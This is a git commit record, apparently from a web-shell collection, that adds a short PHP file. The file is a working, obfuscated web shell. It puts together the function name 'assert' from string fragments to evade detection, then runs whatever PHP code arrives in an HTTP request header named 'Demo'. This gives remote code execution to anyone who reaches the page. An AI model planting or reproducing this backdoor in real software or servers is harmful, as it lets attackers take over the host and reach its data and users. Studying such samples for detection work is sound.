tennc 2022-09-09 23:14:12 +08:00 committed by GitHub
parent 33e854d721
commit 35d39e031c
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

8
php/2022-09-09-04.php Normal file
View file

@ -0,0 +1,8 @@
<?php
session_start();
$a = "a";
$s = "s";
$c=$a.$s."sert";
$c(getallheaders()['Demo']);
?>